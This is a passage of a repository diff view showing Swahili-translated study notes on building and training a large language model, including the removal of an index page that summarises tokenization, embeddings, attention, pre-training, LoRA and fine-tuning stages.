11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** Mkusanyiko mkubwa wa maswali na majibu ya trivia, pamoja na hati za ushahidi.
 | 
			
		||||
 | 
			
		||||
na mengi zaidi
 | 
			
		||||
 | 
			
		||||
## Follow instructions fine-tuning code
 | 
			
		||||
 | 
			
		||||
Unaweza kupata mfano wa msimbo wa kufanya marekebisho haya katika [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)
 | 
			
		||||
 | 
			
		||||
## References
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,98 +0,0 @@
 | 
			
		||||
# LLM Training - Data Preparation
 | 
			
		||||
 | 
			
		||||
**Hizi ni nota zangu kutoka kwa kitabu kinachopendekezwa sana** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **pamoja na taarifa za ziada.**
 | 
			
		||||
 | 
			
		||||
## Basic Information
 | 
			
		||||
 | 
			
		||||
Unapaswa kuanza kwa kusoma chapisho hili kwa baadhi ya dhana za msingi unazopaswa kujua kuhusu:
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
0.-basic-llm-concepts.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 1. Tokenization
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya awali ni rahisi sana: **Gawanya ingizo katika token (ids) kwa njia ambayo ina maana**.
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
1.-tokenizing.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 2. Data Sampling
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya pili ni rahisi sana: **Chukua sampuli ya data ya ingizo na kuandaa kwa awamu ya mafunzo kwa kawaida kwa kutenganisha dataset katika sentensi za urefu maalum na pia kuzalisha jibu linalotarajiwa.**
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
2.-data-sampling.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 3. Token Embeddings
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya tatu ni rahisi sana: **Patia kila moja ya token zilizopita katika msamiati vector ya vipimo vinavyotakiwa ili kufundisha mfano.** Kila neno katika msamiati litakuwa na pointi katika nafasi ya vipimo X.\
 | 
			
		||||
> Kumbuka kwamba awali nafasi ya kila neno katika nafasi inaanzishwa "kwa bahati nasibu" na nafasi hizi ni vigezo vinavyoweza kufundishwa (vitaboreshwa wakati wa mafunzo).
 | 
			
		||||
>
 | 
			
		||||
> Zaidi ya hayo, wakati wa token embedding **tabaka lingine la embeddings linaundwa** ambalo linawakilisha (katika kesi hii) **nafasi halisi ya neno katika sentensi ya mafunzo**. Kwa njia hii neno katika nafasi tofauti katika sentensi litakuwa na uwakilishi tofauti (maana).
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
3.-token-embeddings.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 4. Attention Mechanisms
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya nne ni rahisi sana: **Tumia baadhi ya mitambo ya umakini**. Hizi zitakuwa tabaka nyingi **zinazorudiwa** ambazo zitakuwa **zinakamata uhusiano wa neno katika msamiati na majirani zake katika sentensi ya sasa inayotumika kufundisha LLM**.\
 | 
			
		||||
> Tabaka nyingi zinatumika kwa hili, hivyo vigezo vingi vinavyoweza kufundishwa vitakuwa vinakamata taarifa hii.
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
4.-attention-mechanisms.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 5. LLM Architecture
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya tano ni rahisi sana: **Tengeneza muundo wa LLM kamili**. Panga kila kitu pamoja, tumia tabaka zote na uunde kazi zote za kuzalisha maandiko au kubadilisha maandiko kuwa IDs na kinyume chake.
 | 
			
		||||
>
 | 
			
		||||
> Muundo huu utatumika kwa mafunzo na kutabiri maandiko baada ya kufundishwa.
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
5.-llm-architecture.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 6. Pre-training & Loading models
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la awamu hii ya sita ni rahisi sana: **Fundisha mfano kutoka mwanzo**. Kwa hili muundo wa awali wa LLM utatumika na miduara fulani ikipita juu ya seti za data kwa kutumia kazi za hasara zilizofafanuliwa na optimizer ili kufundisha vigezo vyote vya mfano.
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
6.-pre-training-and-loading-models.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 7.0. LoRA Improvements in fine-tuning
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Matumizi ya **LoRA hupunguza sana hesabu** inayohitajika ili **kurekebisha** mifano iliyofundishwa tayari.
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
7.0.-lora-improvements-in-fine-tuning.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 7.1. Fine-Tuning for Classification
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la sehemu hii ni kuonyesha jinsi ya kurekebisha mfano uliofundishwa tayari ili badala ya kuzalisha maandiko mapya LLM itachagua kutoa **uwezekano wa maandiko yaliyotolewa kuainishwa katika kila moja ya makundi yaliyotolewa** (kama maandiko ni spam au la).
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
7.1.-fine-tuning-for-classification.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## 7.2. Fine-Tuning to follow instructions
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la sehemu hii ni kuonyesha jinsi ya **kurekebisha mfano uliofundishwa tayari ili kufuata maelekezo** badala ya tu kuzalisha maandiko, kwa mfano, kujibu kazi kama roboti ya mazungumzo.
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
7.2.-fine-tuning-to-follow-instructions.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user